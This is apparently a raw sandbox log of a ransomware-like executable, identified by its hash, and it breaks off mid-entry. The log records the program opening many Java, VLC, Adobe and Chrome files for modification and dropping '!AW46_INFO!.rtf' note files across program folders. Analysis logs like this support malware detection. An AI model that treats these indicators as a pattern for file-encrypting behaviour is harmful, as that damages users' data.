7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sk.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\AssertConfirm.WTV 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\images\cursors\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-CN.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hi.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\SetResize.snd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files 